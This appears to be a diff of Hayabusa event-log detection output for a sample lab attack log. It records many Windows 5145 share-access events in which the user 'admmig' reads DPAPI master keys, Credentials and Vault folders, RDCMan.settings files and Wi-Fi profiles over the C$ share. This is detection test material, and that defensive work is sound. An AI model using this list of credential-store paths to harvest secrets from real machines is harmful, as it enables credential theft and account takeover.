+2021-12-12 20:53:11.763 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.794 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.826 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.841 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.889 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.905 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.956 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.718 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.562 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.577 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
